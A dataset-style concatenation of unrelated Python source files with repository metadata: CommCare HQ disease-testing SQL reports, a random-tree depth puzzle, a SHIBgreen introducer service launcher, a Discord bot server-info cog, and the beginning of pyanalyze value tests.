] | 1 | 2022-03-12T01:03:25.000Z | 2022-03-12T01:03:25.000Z | custom/apps/gsid/reports/sql_reports.py | johan--/commcare-hq | 86ee99c54f55ee94e4c8f2f6f30fc44e10e69ebd | [
"BSD-3-Clause"
] | null | null | null | import functools
from sqlagg.columns import *
from sqlagg.base import AliasColumn
from sqlagg.filters import *
from corehq.apps.fixtures.models import FixtureDataItem, FixtureDataType
from corehq.apps.reports.datatables import DataTablesColumn, DataTablesHeader, DataTablesColumnGroup, DTSortType
from corehq.apps.reports.graph_models import MultiBarChart, LineChart, Axis
from corehq.apps.reports.sqlreport import DatabaseColumn, SummingSqlTabularReport, AggregateColumn, calculate_total_row
from corehq.apps.reports.standard import CustomProjectReport, DatespanMixin
from corehq.apps.reports.standard.maps import GenericMapReport
from corehq.apps.reports.util import format_datatables_data
from corehq.apps.userreports.sql import get_table_name
from corehq.const import USER_MONTH_FORMAT
from corehq.util.dates import iso_string_to_date
from dimagi.utils.decorators.memoized import memoized
from dimagi.utils.parsing import json_format_date
from util import get_unique_combinations, capitalize_fn
from datetime import timedelta
class StaticColumn(AliasColumn):
column_key = None
def __init__(self, key, value):
super(StaticColumn, self).__init__(key)
self.value = value
def get_value(self, row):
return self.value
class GSIDSQLReport(SummingSqlTabularReport, CustomProjectReport, DatespanMixin):
fields = ['custom.apps.gsid.reports.TestField',
'corehq.apps.reports.filters.dates.DatespanFilter',
'custom.apps.gsid.reports.AsyncClinicField',
'custom.apps.gsid.reports.AggregateAtField']
exportable = True
emailable = True
default_aggregation = "clinic"
def __init__(self, request, base_context=None, domain=None, **kwargs):
self.is_map = kwargs.pop('map', False)
super(GSIDSQLReport, self).__init__(request, base_context=base_context, domain=domain, **kwargs)
@property
def table_name(self):
return get_table_name(self.domain, 'patient_summary')
@property
def daterange_display(self):
format = "%d %b %Y"
st = self.datespan.startdate.strftime(format)
en = self.datespan.enddate.strftime(format)
return "%s to %s" % (st, en)
@property
def report_subtitles(self):
if self.needs_filters:
return []
subtitles = ["Date range: %s" % self.daterange_display]
if self.selected_fixture():
tag, id = self.selected_fixture()
location = FixtureDataItem.get(id).fields_without_attributes['%s_name' % tag]
subtitles.append('Location: %s' % location)
if self.disease:
location = FixtureDataItem.get(self.disease[1]).fields_without_attributes['disease_name']
subtitles.append('Disease: %s' % location)
if self.test_version:
test_version = FixtureDataItem.get(self.test_version[1]).fields_without_attributes['visible_test_name']
subtitles.append('Test Version: %s' % test_version)
return subtitles
@property
@memoized
def diseases(self):
disease_fixtures = FixtureDataItem.by_data_type(
self.domain,
FixtureDataType.by_domain_tag(self.domain, "diseases").one()
)
return {
"ids": [d.fields_without_attributes["disease_id"] for d in disease_fixtures],
"names": [d.fields_without_attributes["disease_name"] for d in disease_fixtures]
}
@property
def test_types(self):
test_fixtures = FixtureDataItem.by_data_type(
self.domain,
FixtureDataType.by_domain_tag(self.domain, "test").one()
)
return [t.fields_without_attributes["test_name"] for t in test_fixtures]
@property
def filter_values(self):
ret = dict(
domain=self.domain,
startdate=self.datespan.startdate_param,
enddate=self.datespan.enddate_param,
male="male",
female="female",
positive="POSITIVE"
)
DISEASES = self.diseases["ids"]
TESTS = self.test_types
ret.update(zip(DISEASES, DISEASES))
ret.update(zip(TESTS, TESTS))
return ret
@property
def filters(self):
return [EQ("domain", "domain"), BETWEEN("date", "startdate", "enddate")] + self.disease_filters
@property
def disease(self):
disease = self.request.GET.get('test_type_disease', '')
return disease.split(':') if disease else None
@property
def test_version(self):
test = self.request.GET.get('test_type_test', '')
return test.split(':') if test else None
@property
def disease_filters(self):
disease = self.disease
test = self.test_version
filters = []
if test:
filters.append(EQ("test_version", test[0]))
elif disease:
filters.append(EQ("disease_name", disease[0]))
return filters
@property
@memoized
def gps_key(self):
gps_key = "gps"
agg_at = self.request.GET.get('aggregate_at', None)
if agg_at and not agg_at == "clinic":
gps_key = "gps_" + agg_at
return gps_key
@property
def group_by(self):
return self.place_types
@property
def keys(self):
combos = get_unique_combinations(self.domain, place_types=self.place_types, place=self.selected_fixture())
for c in combos:
yield [c[pt] for pt in self.place_types]
def selected_fixture(self):
fixture = self.request.GET.get('fixture_id', "")
return fixture.split(':') if fixture else None
@property
@memoized
def place_types(self):
opts = ['country', 'province', 'district', 'clinic']
agg_at = self.request.GET.get('aggregate_at', None)
agg_at = agg_at if agg_at and opts.index(agg_at) <= opts.index(self.default_aggregation) else self.default_aggregation
place = self.selected_fixture()
agg_at = place[0] if place and opts.index(agg_at) < opts.index(place[0]) else agg_at
return opts[:opts.index(agg_at) + 1]
@property
def common_columns(self):
columns = []
for place in self.place_types:
columns.append(DatabaseColumn(place.capitalize(), SimpleColumn(place), format_fn=capitalize_fn))
return columns
class GSIDSQLPatientReport(GSIDSQLReport):
name = "Patient Summary Report"
slug = "patient_summary_sql"
section_name = "patient summary"
age_range_map = {'male': [None, None], 'female': [None, None], 'total': [None, None]}
def age_fn(self, key, min, max):
age_range = self.age_range_map[key]
if min is not None and (age_range[0] is None or min < age_range[0]):
self.age_range_map[key][0] = min
if max is not None and (age_range[1] is None or max > age_range[1]):
self.age_range_map[key][1] = max
return self.format_age_range(min, max)
def format_age_range(self, min, max):
return str(min if min is not None else "-") + " - " + str(max if max is not None else "-")
def percent_agg_fn(self, x, t):
return dict(sort_key=x or 0, html="%(x)s (%(p)s%%)" % \
{
"x": x or 0,
"p": (100 * int(x or 0) / (t or 1))
})
@property
def columns(self):
sum_fn = lambda x, y: int(x or 0) + int(y or 0)
total_percent_agg_fn = lambda f_pos, m_pos, f_tot, m_tot: dict(sort_key=sum_fn(f_pos, m_pos), html="%(x)s (%(p)s%%)" % \
{
"x": sum_fn(f_pos, m_pos),
"p": (100 * sum_fn(f_pos, m_pos) / (sum_fn(m_tot, f_tot) or 1))
})
patient_number_group = DataTablesColumnGroup("Tests")
positive_group = DataTablesColumnGroup("Positive Tests")
age_range_group = DataTablesColumnGroup("Age Range")
male_filter = EQ("gender", "male")
female_filter = EQ("gender", "female")
columns = self.common_columns + [
DatabaseColumn(
"Number of Males ",
CountColumn('doc_id', alias="male-total", filters=self.filters + [male_filter]),
header_group=patient_number_group
),
DatabaseColumn(
"Number of Females ",
CountColumn('doc_id', alias="female-total", filters=self.filters + [female_filter]),
header_group=patient_number_group
),
AggregateColumn(
"Total", sum_fn,
[AliasColumn("male-total"), AliasColumn("female-total")],
header_group=patient_number_group
),
AggregateColumn(
"Male +ve Percent", self.percent_agg_fn,
[
CountColumn(
'doc_id',
alias="male-positive",
filters=self.filters + [AND([male_filter, EQ("diagnosis", "positive")])]
),
AliasColumn("male-total")
],
header_group=positive_group, sort_type=DTSortType.NUMERIC
),
AggregateColumn(
"Female +ve Percent", self.percent_agg_fn,
[
CountColumn('doc_id',
alias="female-positive",
filters=self.filters + [AND([female_filter, EQ("diagnosis", "positive")])]
),
AliasColumn("female-total")
],
header_group=positive_group, sort_type=DTSortType.NUMERIC
),
AggregateColumn(
"Total +ve Percent", total_percent_agg_fn,
[
AliasColumn("female-positive"),
AliasColumn("male-positive"),
AliasColumn("female-total"), AliasColumn("male-total")
],
header_group=positive_group, sort_type=DTSortType.NUMERIC
),
AggregateColumn(
"Male age range", functools.partial(self.age_fn, 'male'),
[
MinColumn("age", alias="male-min", filters=self.filters + [male_filter]),
MaxColumn("age", alias="male-max", filters=self.filters + [male_filter])
],
header_group=age_range_group
),
AggregateColumn(
"Female age range", functools.partial(self.age_fn, 'female'),
[
MinColumn("age", alias="female-min", filters=self.filters + [female_filter]),
MaxColumn("age", alias="female-max", filters=self.filters + [female_filter])
],
header_group=age_range_group
),
AggregateColumn(
"All age range", functools.partial(self.age_fn, 'total'),
[
MinColumn("age", alias="age-min", filters=self.filters + [OR([female_filter, male_filter])]),
MaxColumn("age", alias="age-max", filters=self.filters + [OR([female_filter, male_filter])])
],
header_group=age_range_group
),
]
if self.is_map:
columns.append(DatabaseColumn("gps", MaxColumn(self.gps_key), format_fn=lambda x: x))
disease = FixtureDataItem.get(self.disease[1]).fields_without_attributes['disease_name'] if self.disease else 'All diseases'
columns.append(DatabaseColumn('disease', StaticColumn('disease', disease)))
return columns
@property
def rows(self):
rows = super(GSIDSQLPatientReport, self).rows
self.total_row[0] = 'Total'
# total age ranges
col_start = -5 if self.is_map else -3
self.total_row[col_start] = self.format_age_range(self.age_range_map['male'][0], self.age_range_map['male'][1])
self.total_row[col_start+1] = self.format_age_range(self.age_range_map['female'][0], self.age_range_map['female'][1])
self.total_row[col_start+2] = self.format_age_range(self.age_range_map['total'][0], self.age_range_map['total'][1])
# formatted percent totals
pos_col_start = -8 if self.is_map else -6
tot_col_start = -11 if self.is_map else -9
m_tot = self.total_row[tot_col_start]
f_tot = self.total_row[tot_col_start+1]
tot = self.total_row[tot_col_start+2]
m_pos = self.total_row[pos_col_start]
f_pos = self.total_row[pos_col_start+1]
tot_pos = self.total_row[pos_col_start+2]
self.total_row[pos_col_start] = self.percent_agg_fn(m_pos, m_tot)
self.total_row[pos_col_start+1] = self.percent_agg_fn(f_pos, f_tot)
self.total_row[pos_col_start+2] = self.percent_agg_fn(tot_pos, tot)
return rows
@property
def charts(self):
rows = self.rows
loc_axis = Axis(label="Location")
tests_axis = Axis(label="Number of Tests", format=",.1d")
chart = MultiBarChart("Number of Tests Per Location", loc_axis, tests_axis)
chart.stacked = True
chart.tooltipFormat = " in "
chart.add_dataset(
"Male Tests",
[{'x':row[-10], 'y':row[-9]['html'] if row[-9] != "--" else 0} for row in rows],
color="#0006CE"
)
chart.add_dataset(
"Female Tests",
[{'x':row[-10], 'y':row[-8]['html'] if row[-8] != "--" else 0} for row in rows],
color="#70D7FF"
)
return [chart]
class GSIDSQLByDayReport(GSIDSQLReport):
name = "Day Summary Report"
slug = "day_summary_sql"
section_name = "day summary"
@property
def group_by(self):
return super(GSIDSQLByDayReport, self).group_by + ["date", "disease_name"]
@property
def columns(self):
return self.common_columns + \
[
DatabaseColumn("Count", CountColumn("doc_id", alias="day_count")),
DatabaseColumn("disease", SimpleColumn("disease_name", alias="disease_name"))
]
def daterange(self, start_date, end_date):
for n in range(int((end_date - start_date).days) + 1):
yield json_format_date(start_date + timedelta(n))
@property
def headers(self):
startdate = self.datespan.startdate
enddate = self.datespan.enddate
column_headers = []
group_by = self.group_by[:-2]
for place in group_by:
column_headers.append(DataTablesColumn(place.capitalize()))
column_headers.append(DataTablesColumn("Disease"))
prev_month = startdate.month
month_columns = [startdate.strftime(USER_MONTH_FORMAT)]
for n, day in enumerate(self.daterange(startdate, enddate)):
day_obj = iso_string_to_date(day)
month = day_obj.month
day_column = DataTablesColumn("Day%(n)s (%(day)s)" % {'n':n+1, 'day': day})
if month == prev_month:
month_columns.append(day_column)
else:
month_group = DataTablesColumnGroup(*month_columns)
column_headers.append(month_group)
month_columns = [day_obj.strftime(USER_MONTH_FORMAT), day_column]
prev_month = month
month_group = DataTablesColumnGroup(*month_columns)
column_headers.append(month_group)
return DataTablesHeader(*column_headers)
@property
def rows(self):
startdate = self.datespan.startdate
enddate = self.datespan.enddate
old_data = self.data
rows = []
for loc_key in self.keys:
selected_disease = self.request.GET.get('test_type_disease', '')
selected_disease = selected_disease.split(':') if selected_disease else None
diseases = [selected_disease[0]] if selected_disease else self.diseases["ids"]
for disease in diseases:
row = [capitalize_fn(x) for x in loc_key]
disease_names = self.diseases["names"]
index = self.diseases['ids'].index(disease)
row.append(disease_names[index])
for n, day in enumerate(self.daterange(startdate, enddate)):
temp_key = [loc for loc in loc_key]
temp_key.append(iso_string_to_date(day))
temp_key.append(disease)
keymap = old_data.get(tuple(temp_key), None)
day_count = (keymap["day_count"] if keymap else None)
row.append(format_datatables_data(day_count or self.no_value, day_count or 0))
rows.append(row)
self.total_row = calculate_total_row(rows)
self.total_row[0] = 'Total'
return rows
@property
def charts(self):
rows = self.rows
date_index = len(self.place_types)
startdate = self.datespan.startdate
enddate = self.datespan.enddate
date_axis = Axis(label="Date", dateFormat="%b %d")
tests_axis = Axis(label="Number of Tests")
chart = LineChart("Number of Tests Per Day", date_axis, tests_axis)
for row in rows:
data_points = []
for n, day in enumerate(self.daterange(startdate, enddate)):
x = day
y = 0 if row[date_index + n + 1] == "--" else row[date_index + n + 1]
data_points.append({'x': x, 'y': y['sort_key']})
chart.add_dataset(row[date_index-1] + "(" + row[date_index] + ")", data_points)
return [chart]
class GSIDSQLTestLotsReport(GSIDSQLReport):
name = "Test Lots Report"
slug = "test_lots_sql"
section_name = "test lots"
@classmethod
def show_in_navigation(cls, domain=None, project=None, user=None):
return user and user.is_previewer()
@property
def group_by(self):
return super(GSIDSQLTestLotsReport, self).group_by + ["test_version", "lot_number"]
@property
def columns(self):
return self.common_columns + [
DatabaseColumn("Test", CountColumn('doc_id', alias="lot_count"))
]
@property
def test_lots_map(self):
old_data = self.data
lots_map = dict()
for key in old_data.keys():
if lots_map.get(key[-2], None):
lots_map[key[-2]].append(key[-1])
else:
lots_map[key[-2]] = [key[-1]]
return lots_map
@property
def selected_tests(self):
disease = self.request.GET.get('test_type_disease', '')
test = self.request.GET.get('test_type_test', '')
disease = disease.split(':') if disease else None
test = test.split(':') if test else None
if test:
return [test[0]]
elif disease:
test_fixtures = FixtureDataItem.by_field_value(
self.domain,
FixtureDataType.by_domain_tag(self.domain, "test").one(),
"disease_id",
disease[0]
)
return [t.fields_without_attributes["test_name"] for t in test_fixtures]
else:
return self.test_types
@property
def rows(self):
test_lots_map = self.test_lots_map
selected_tests = self.selected_tests
old_data = self.data
rows = []
for loc_key in self.keys:
row = [capitalize_fn(loc) for loc in loc_key]
for test in selected_tests:
test_lots = test_lots_map.get(test, None)
if not test_lots:
row.append(format_datatables_data(self.no_value, 0))
continue
total_test_count = 0
for lot_number in test_lots:
temp_key = [loc for loc in loc_key] + [test, lot_number]
data_map = old_data.get(tuple(temp_key), None)
lot_count = data_map["lot_count"] if data_map else None
row.append(format_datatables_data(lot_count or self.no_value, lot_count or 0))
total_test_count += data_map["lot_count"] if data_map else 0
row.append(format_datatables_data(total_test_count or self.no_value, total_test_count or 0))
rows.append(row)
self.total_row = calculate_total_row(rows)
self.total_row[0] = 'Total'
return rows
@property
def headers(self):
column_headers = [DataTablesColumn(loc.capitalize()) for loc in self.group_by[:-2]]
test_lots_map = self.test_lots_map
for test in self.selected_tests:
lots_headers = [test]
lots = test_lots_map.get(test, None)
if not lots:
lots_headers.append(DataTablesColumn("NO-LOTS"))
column_headers.append(DataTablesColumnGroup(*lots_headers))
continue
for lot in lots:
lots_headers.append(DataTablesColumn(str(lot)))
lots_headers.append(DataTablesColumn("TOTAL"))
column_headers.append(DataTablesColumnGroup(*lots_headers))
return DataTablesHeader(*column_headers)
class GSIDSQLByAgeReport(GSIDSQLReport):
name = "Age Summary Report"
slug = "age_summary_sql"
section_name = "age summary"
@property
def filter_values(self):
age_filters = dict(
zero=0,
ten=10,
ten_plus=11,
twenty=20,
twenty_plus=21,
fifty=50
)
default_filter_values = super(GSIDSQLByAgeReport, self).filter_values
default_filter_values.update(age_filters)
return default_filter_values
def percent_fn(self, x, y):
return dict(
sort_key=x or 0,
html="%(x)s (%(p)s%%)" % {"x": int(x or 0), "p": 100*(x or 0) / (y or 1)})
@property
def columns(self):
female_range_group = DataTablesColumnGroup("Female Positive Tests (% positive)")
male_range_group = DataTablesColumnGroup("Male Positive Tests (% positive)")
def age_range_filter(gender, age_from, age_to):
return [AND([EQ("gender", gender), EQ("diagnosis", "positive"), BETWEEN("age", age_from, age_to)])]
def generate_columns(gender):
age_range_group = male_range_group if gender is "male" else female_range_group
return [
AggregateColumn(
"0-10", self.percent_fn,
[
CountColumn(
'doc_id',
alias="zero_ten_" + gender,
filters=self.filters + age_range_filter(gender, "zero", "ten")
),
AliasColumn(gender + "_total")
],
header_group=age_range_group, sort_type=DTSortType.NUMERIC
),
AggregateColumn(
"10-20", self.percent_fn,
[
CountColumn(
'doc_id',
alias="ten_twenty_" + gender,
filters=self.filters + age_range_filter(gender, "ten_plus", "twenty")
),
AliasColumn(gender + "_total")
],
header_group=age_range_group, sort_type=DTSortType.NUMERIC
),
AggregateColumn(
"20-50", self.percent_fn,
[
CountColumn(
'doc_id',
alias="twenty_fifty_" + gender,
filters= self.filters + age_range_filter(gender, "twenty_plus", "fifty")
),
AliasColumn(gender + "_total")
],
header_group=age_range_group, sort_type=DTSortType.NUMERIC
),
AggregateColumn(
"50+", self.percent_fn,
[
CountColumn(
'doc_id',
alias="fifty_" + gender,
filters=self.filters + [AND([EQ("gender", gender), EQ("diagnosis", "positive"), GT("age", "fifty")])]),
AliasColumn(gender + "_total")
],
header_group=age_range_group, sort_type=DTSortType.NUMERIC
),
AggregateColumn(
"Total", self.percent_fn,
[
CountColumn(
'doc_id',
alias="positive_total_" + gender,
filters=self.filters + [AND([EQ("gender", gender), EQ("diagnosis", "positive")])]),
CountColumn(
'doc_id',
alias=gender + "_total",
filters=self.filters + [EQ("gender", gender)]),
],
header_group=age_range_group, sort_type=DTSortType.NUMERIC
),
]
totals_group = DataTablesColumnGroup("Total tests")
sum_fn = lambda x, y: int(x or 0) + int(y or 0)
return self.common_columns + [
DatabaseColumn(
"Males ",
AliasColumn("male_total"),
header_group=totals_group
),
DatabaseColumn(
"Females ",
AliasColumn("female_total"),
header_group=totals_group
),
AggregateColumn(
"Total", sum_fn,
[AliasColumn("male_total"), AliasColumn("female_total")],
header_group=totals_group
),
] + generate_columns("male") + generate_columns("female")
@property
def rows(self):
rows = super(GSIDSQLByAgeReport, self).rows
self.total_row[0] = 'Total'
# custom total row formatting
tot_col_start = -13
m_tot = self.total_row[tot_col_start]
f_tot = self.total_row[tot_col_start+1]
m_pos_start = -10
self.total_row[m_pos_start] = self.percent_fn(self.total_row[m_pos_start], m_tot)
self.total_row[m_pos_start+1] = self.percent_fn(self.total_row[m_pos_start+1], m_tot)
self.total_row[m_pos_start+2] = self.percent_fn(self.total_row[m_pos_start+2], m_tot)
self.total_row[m_pos_start+3] = self.percent_fn(self.total_row[m_pos_start+3], m_tot)
self.total_row[m_pos_start+4] = self.percent_fn(self.total_row[m_pos_start+4], m_tot)
f_pos_start = -5
self.total_row[f_pos_start] = self.percent_fn(self.total_row[f_pos_start], f_tot)
self.total_row[f_pos_start+1] = self.percent_fn(self.total_row[f_pos_start+1], f_tot)
self.total_row[f_pos_start+2] = self.percent_fn(self.total_row[f_pos_start+2], f_tot)
self.total_row[f_pos_start+3] = self.percent_fn(self.total_row[f_pos_start+3], f_tot)
self.total_row[f_pos_start+4] = self.percent_fn(self.total_row[f_pos_start+4], f_tot)
return rows
class PatientMapReport(GenericMapReport, CustomProjectReport):
name = "Patient Summary (Map)"
slug = "patient_summary_map"
fields = ['custom.apps.gsid.reports.TestField',
'corehq.apps.reports.filters.dates.DatespanFilter',
'custom.apps.gsid.reports.AsyncClinicField',
'custom.apps.gsid.reports.AggregateAtField']
data_source = {
'adapter': 'legacyreport',
'geo_column': 'gps',
'report': 'custom.apps.gsid.reports.sql_reports.GSIDSQLPatientReport',
'report_params': {'map': True}
}
@property
def display_config(self):
return {
'column_titles': {
'Positive Tests::Female +ve Percent': 'Positive tests: Female',
'Positive Tests::Male +ve Percent': 'Positive tests: Male',
'Positive Tests::Total +ve Percent': 'Positive tests: Total',
'Tests::Number of Females ': 'Total tests: Female',
'Tests::Number of Males ': 'Total tests: Male',
'Tests::Total': 'Total tests',
'Age Range::All age range': 'Age range: All',
'Age Range::Female age range': 'Age range: Female',
'Age Range::Male age range': 'Age range: Male',
'disease': 'Disease',
},
'detail_columns': self.place_types + [
'disease',
'__space__',
'Positive Tests::Female +ve Percent',
'Positive Tests::Male +ve Percent',
'Positive Tests::Total +ve Percent',
'Tests::Number of Females ',
'Tests::Number of Males ',
'Tests::Total',
],
'table_columns': self.place_types + [
'Tests::Number of Females ',
'Tests::Number of Males ',
'Tests::Total',
'Positive Tests::Female +ve Percent',
'Positive Tests::Male +ve Percent',
'Positive Tests::Total +ve Percent',
'Age Range::Female age range',
'Age Range::Male age range',
'Age Range::All age range',
],
'detail_template': """<div class="default-popup">
<table>
<% _.each(info, function(field) { %>
<tr class="data data-<%= field.slug %>">
<% if (field.slug === '__space__') { %>
<td> </td><td> </td>
<% } else { %>
<td><%= field.label %></td>
<td class="detail_data">
<%= field.value %>
</td>
<% } %>
</tr>
<% }); %>
</table>
</div>"""
}
@property
def agg_level(self):
agg_at = self.request.GET.get('aggregate_at', None)
return agg_at if agg_at else 'clinic'
@property
def place_types(self):
opts = ['country', 'province', 'district', 'clinic']
agg_at = self.agg_level
return [o.title() for o in opts[:opts.index(agg_at) + 1]]
| 39.014031 | 136 | 0.565077 |
795ba3610878abe65fc03a09b97d92840e3d238b | 1,484 | py | Python | PYTHON/scripts/puzzles/twoBranch.py | oruanaidh-ai/wayback_machine | 2529fc9e18120a092890abbb94483f643682fb90 | [
"BSD-2-Clause"
] | null | null | null | PYTHON/scripts/puzzles/twoBranch.py | oruanaidh-ai/wayback_machine | 2529fc9e18120a092890abbb94483f643682fb90 | [
"BSD-2-Clause"
] | null | null | null | PYTHON/scripts/puzzles/twoBranch.py | oruanaidh-ai/wayback_machine | 2529fc9e18120a092890abbb94483f643682fb90 | [
"BSD-2-Clause"
] | null | null | null | class Node:
pass
import random
top = Node()
def buildTree(t, lev=5):
"""
Build a random tree. It is not a binary tree.
Subnodes (if they exist) are placed inside a vector.
There can be as many as fifteen subnodes.
"""
if lev == 0: return
subnodes = []
for i in range(15):
node = Node()
if random.random() < 1.0 - 1.0/(lev+1):
subnodes.append(buildTree(node, lev-1))
t.subnodes = subnodes
return t
tree = buildTree(top, 5)
count = {}
def countNodes(t):
if t in count: return count[t]
if hasattr(t, 'subnodes'):
count[t] = 1 + sum(countNodes(x) for x in t.subnodes)
else:
count[t] = 1
return count[t]
print countNodes(tree)
tree_memory = {}
def depth(t):
if t in tree_memory: return tree_memory[t]
if hasattr(t, 'subnodes') and len(t.subnodes):
tree_memory[t] = 1 + max(depth(s) for s in t.subnodes)
else:
tree_memory[t] = 1
return tree_memory[t]
print depth(tree)
ddeep = {}
def doubleDeep(t):
if t in ddeep: return ddeep[t]
if hasattr(t, 'subnodes') and len(t.subnodes) >= 2:
dd = [depth(n) for n in t.subnodes]
dd.sort()
v = 1 + dd[-2] + dd[-1]
else:
v = 1
if hasattr(t, 'subnodes') and len(t.subnodes) >= 1:
maxVsubnode = max(doubleDeep(n) for n in t.subnodes)
if v < maxVsubnode: v = maxVsubnode
ddeep[t] = v
return ddeep[t]
print doubleDeep(tree)
| 21.2 | 62 | 0.578167 |
795ba3855053a137b2481d91c6ec7ffcb94c78c9 | 1,294 | py | Python | shibgreen/server/start_introducer.py | BTCgreen-Network/shibgreen-blockchain | b1e41e82ad849775543aa36fefc0c0d03e13f6e8 | [
"Apache-2.0"
] | 12 | 2021-11-10T02:52:38.000Z | 2022-03-22T10:19:45.000Z | shibgreen/server/start_introducer.py | BTCgreen-Network/shibgreen-blockchain | b1e41e82ad849775543aa36fefc0c0d03e13f6e8 | [
"Apache-2.0"
] | 13 | 2021-11-16T03:09:34.000Z | 2022-03-09T00:45:05.000Z | shibgreen/server/start_introducer.py | BTCgreen-Network/shibgreen-blockchain | b1e41e82ad849775543aa36fefc0c0d03e13f6e8 | [
"Apache-2.0"
] | 1 | 2022-03-15T08:25:06.000Z | 2022-03-15T08:25:06.000Z | import pathlib
from typing import Dict
from shibgreen.introducer.introducer import Introducer
from shibgreen.introducer.introducer_api import IntroducerAPI
from shibgreen.server.outbound_message import NodeType
from shibgreen.server.start_service import run_service
from shibgreen.util.config import load_config_cli
from shibgreen.util.default_root import DEFAULT_ROOT_PATH
# See: https://bugs.python.org/issue29288
"".encode("idna")
SERVICE_NAME = "introducer"
def service_kwargs_for_introducer(
root_path: pathlib.Path,
config: Dict,
) -> Dict:
introducer = Introducer(config["max_peers_to_send"], config["recent_peer_threshold"])
node__api = IntroducerAPI(introducer)
network_id = config["selected_network"]
kwargs = dict(
root_path=root_path,
node=introducer,
peer_api=node__api,
node_type=NodeType.INTRODUCER,
advertised_port=config["port"],
service_name=SERVICE_NAME,
server_listen_ports=[config["port"]],
network_id=network_id,
)
return kwargs
def main() -> None:
config = load_config_cli(DEFAULT_ROOT_PATH, "config.yaml", SERVICE_NAME)
kwargs = service_kwargs_for_introducer(DEFAULT_ROOT_PATH, config)
return run_service(**kwargs)
if __name__ == "__main__":
main()
| 28.755556 | 89 | 0.74575 |
795ba500d6e4e362e9ca6c7f5d40140382346b22 | 2,145 | py | Python | cogs/server_info.py | NilsRG/discord-bot | 2f4dd1511a011a524c01d875f3cb55c0cc48cad9 | [
"MIT"
] | 1 | 2021-03-04T23:24:39.000Z | 2021-03-04T23:24:39.000Z | cogs/server_info.py | dylanbuchi/discord-bot-sb | 374a062bce669c13d8ecdf876a10e48d3bd884cd | [
"MIT"
] | null | null | null | cogs/server_info.py | dylanbuchi/discord-bot-sb | 374a062bce669c13d8ecdf876a10e48d3bd884cd | [
"MIT"
] | 2 | 2021-03-06T10:56:21.000Z | 2021-06-30T12:40:24.000Z | import discord, datetime, time
from discord.ext import commands
from datetime import datetime, timedelta
from cogs.admin_config import get_guild_delete_timer
#bot start time
start_time = time.time()
class Server(commands.Cog):
def __init__(self, client):
self.client = client
# @commands.command(name='timedel')
# async def delete_time(self, ctx):
# global DELETE_TIME
# await ctx.send('enter seconds to delete:', delete_after=DELETE_TIME)
# time = await self.client.wait_for(
# 'message', check=lambda m: m.author == ctx.author)
# try:
# time = int(time.content.lower().strip())
# DELETE_TIME = time
# except:
# await ctx.send('Error only integers are allowed')
# await ctx.message.delete(delay=DELETE_TIME)
@commands.command(name='ping',
description='Ping Pong & latency in milliseconds')
# @commands.has_permissions(manage_guild=True)
async def ping_command(self, ctx):
text = f'🏓 (~{round(self.client.latency, 1)} ms)'
embed = discord.Embed(colour=discord.Colour.green())
embed.add_field(name="Pong!", value=text)
await ctx.send(embed=embed, delete_after=get_guild_delete_timer())
await ctx.message.delete(delay=get_guild_delete_timer())
@commands.command(name='uptime', description='Time since Bot started')
# @commands.has_permissions(manage_guild=True)
async def uptime_command(self, ctx):
current_time = time.time()
difference = int(round(current_time - start_time))
text = str(timedelta(seconds=difference))
embed = discord.Embed(colour=discord.Colour.red())
embed.add_field(name="Uptime", value=text)
try:
await ctx.send(embed=embed, delete_after=get_guild_delete_timer())
await ctx.message.delete(delay=get_guild_delete_timer())
except discord.HTTPException:
await ctx.send("Current uptime: " + text)
await ctx.message.delete(delay=get_guild_delete_timer())
def setup(client):
client.add_cog(Server(client)) | 36.355932 | 78 | 0.657809 |
795ba527a487cfb2b9717a1ce78f6f2facdd25a4 | 10,137 | py | Python | pyanalyze/test_value.py | sobolevn/pyanalyze | f3851db84e57e3ff7f8e2dd271c3b218e2d3bbcc | [
"Apache-2.0"
] | null | null | null | pyanalyze/test_value.py | sobolevn/pyanalyze | f3851db84e57e3ff7f8e2dd271c3b218e2d3bbcc | [
"Apache-2.0"
] | null | null | null | pyanalyze/test_value.py | sobolevn/pyanalyze | f3851db84e57e3ff7f8e2dd271c3b218e2d3bbcc | [
"Apache-2.0"
] | null | null | null | from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
from qcore.asserts import assert_eq, assert_in, assert_is, assert_is_not
from . import tests
from . import value
from .value import KnownValue, TypedValue, MultiValuedValue, SubclassValue
from .test_node_visitor import skip_before
def test_UNRESOLVED_VALUE():
assert not value.UNRESOLVED_VALUE.is_type(int)
def test_known_value():
val = KnownValue(3)
assert_eq(3, val.val)
assert_eq("Literal[3]", str(val))
assert_eq("Literal['']", str(KnownValue("")))
assert val.is_type(int)
assert not val.is_type(str)
assert val.is_value_compatible(KnownValue(3))
assert val.is_value_compatible(TypedValue(int))
assert val.is_value_compatible(MultiValuedValue([KnownValue(3), TypedValue(int)]))
assert not val.is_value_compatible(
MultiValuedValue([KnownValue("x"), TypedValue(int)])
)
assert TypedValue(int).is_value_compatible(val)
assert not TypedValue(str).is_value_compatible(val)
assert not val.is_value_compatible(SubclassValue(int))
assert KnownValue(int).is_value_compatible(SubclassValue(int))
assert not KnownValue(str).is_value_compatible(SubclassValue(int))
def test_unbound_method_value():
val = value.UnboundMethodValue("get_prop_with_get", tests.PropertyObject)
assert_eq("<method get_prop_with_get on pyanalyze.tests.PropertyObject>", str(val))
assert_eq("get_prop_with_get", val.attr_name)
assert_is(tests.PropertyObject, val.typ)
assert_is(None, val.secondary_attr_name)
assert_eq(tests.PropertyObject.get_prop_with_get, val.get_method())
assert val.is_type(object)
assert not val.is_type(str)
val = value.UnboundMethodValue(
"get_prop_with_get", tests.PropertyObject, secondary_attr_name="asynq"
)
assert_eq(
"<method get_prop_with_get.asynq on pyanalyze.tests.PropertyObject>", str(val)
)
assert_eq("get_prop_with_get", val.attr_name)
assert_is(tests.PropertyObject, val.typ)
assert_eq("asynq", val.secondary_attr_name)
method = val.get_method()
assert_in(method.__name__, tests.ASYNQ_METHOD_NAMES)
assert_eq(tests.PropertyObject.get_prop_with_get, method.__self__)
assert val.is_type(object)
assert not val.is_type(str)
def test_typed_value():
val = TypedValue(str)
assert_is(str, val.typ)
assert_eq("str", str(val))
assert val.is_type(str)
assert not val.is_type(int)
assert val.is_value_compatible(TypedValue(str))
assert not val.is_value_compatible(TypedValue(int))
assert val.is_value_compatible(MultiValuedValue([KnownValue("x"), TypedValue(str)]))
assert not val.is_value_compatible(
MultiValuedValue([KnownValue("x"), TypedValue(int)])
)
float_val = TypedValue(float)
assert_eq("float", str(float_val))
assert float_val.is_value_compatible(KnownValue(1.0))
assert float_val.is_value_compatible(KnownValue(1))
assert not float_val.is_value_compatible(KnownValue(""))
assert float_val.is_value_compatible(TypedValue(float))
